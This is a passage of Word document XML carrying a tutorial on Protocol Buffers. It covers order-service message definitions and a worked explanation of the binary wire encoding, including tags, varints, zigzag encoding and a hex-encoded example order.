    <w:p w14:paraId="7F595369" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  ORDER_STATUS_CANCELLED = 5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E1CF45" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D941BE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="56BBC7ED" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>message CreateOrderRequest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF1A7E2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string user_id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC292AB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  repeated OrderItem items = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8196D8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string shipping_address_id = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6284A572" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string idempotency_key = 4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CC0379" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EADF280" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="023D0586" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>message CreateOrderResponse {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A09A42B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Order order = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEBF231" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  bool already_existed = 2;  // true if idempotency_key already used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB73A37" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C40FF7C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="24961808" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>message GetOrderRequest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D24B889" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  string order_id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C81A23" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9F9DA9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="75703A6D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>message ListOrdersRequest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7E6639" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string user_id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25249803" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  OrderStatus status_filter = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E875F2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  int32 page_size = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0189FF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string page_token = 4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6217E79B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1D1BC5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The binary encoding — field by field:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BF3513" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1763F1F2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Wire types (3 bits encode how to read the field):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704594CC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  0: Varint        (int32, int64, uint32, uint64, sint32, sint64, bool, enum)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386A45AE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  1: 64-bit        (fixed64, sfixed64, double)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFFE985" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  2: Length-delimited (string, bytes, embedded messages, repeated fields)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AE6DD4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  5: 32-bit        (fixed32, sfixed32, float)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B84809" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="2DB0825F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Tag encoding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67864F26" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Each field encoded as: (field_number &lt;&lt; 3) | wire_type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26976070" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185B774A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Example: field 1 (string id), wire_type=2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FC1A1E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    tag = (1 &lt;&lt; 3) | 2 = 0x0A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D82A845" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487E41D2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Example: field 2 (string user_id), wire_type=2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAFFEB7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    tag = (2 &lt;&lt; 3) | 2 = 0x12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CB7BC3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="0957B40C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>Varint encoding (variable-length integers):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A2D96D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Most significant bit (MSB) = continuation bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767BCC63" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  7 bits per byte carry actual data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065CEF19" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364D52BF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Value 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6C39DC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Binary: 00000001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F489E9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Varint: 0x01 (1 byte — MSB=0, no continuation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115B7315" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5AB262" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Value 300:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7A5DED" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Binary: 100101100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77721E8B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Split into 7-bit groups: 0000010 0101100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700AA557" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Reverse groups: 0101100 0000010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6375FBB5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Add continuation bits: 10101100 00000010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40462765" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Hex: 0xAC 0x02 (2 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6222F5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E405F7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Value 1:         1 byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C5C353" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Value 127:       1 byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E324E4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Value 128:       2 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0AFB39" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Value 16383:     2 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79547C9D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Value 16384:     3 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393D9B1B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Value 2^31-1:    5 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B742F42" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03459F4B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Negative numbers with sint32/sint64 (zigzag encoding):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FCA916" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    0  → 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EF6440" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    -1 → 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E598A8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    1  → 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641E41B7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    -2 → 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CBFDC4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    2  → 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D344CF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    (maps negatives to positive space — avoids always using 10 bytes for negative ints)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0395BD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="379433A6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Concrete encoding example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8E45CA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="2C183219" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Order {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3746A926" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  id: "ord_123",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD3D5E5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  user_id: "usr_456",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C189C8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  status: ORDER_STATUS_CONFIRMED (= 2),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCFA474" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  total: Money{currency_code: "USD", units: 4999, nanos: 0}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E4FE6F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2001D1C0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="00D87C09" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Binary encoding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1B0B1D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Field 1 (id = "ord_123"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0486009A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Tag: 0x0A (field 1, wire type 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D1C13E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Length: 0x07 (7 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EF2693" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Data: 6F 72 64 5F 31 32 33 ("ord_123" in ASCII)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A7BCB1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Total: 9 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFEA806" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668099DC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Field 2 (user_id = "usr_456"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9B8927" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Tag: 0x12 (field 2, wire type 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE97D26" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Length: 0x07</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B730EDF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Data: 75 73 72 5F 34 35 36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280E425A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Total: 9 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46143928" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E191CB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Field 3 (status = 2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A2DF8E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Tag: 0x18 (field 3, wire type 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B671703" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Value: 0x02 (varint 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEAB26C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Total: 2 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CB9506" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07210570" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Field 7 (total = Money{...}):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DA4FB7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Tag: 0x3A (field 7, wire type 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A30D189" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Length: (length of embedded message)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE33523" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Embedded Money:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607A3450" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      Field 1 (currency_code = "USD"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B35CE88" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
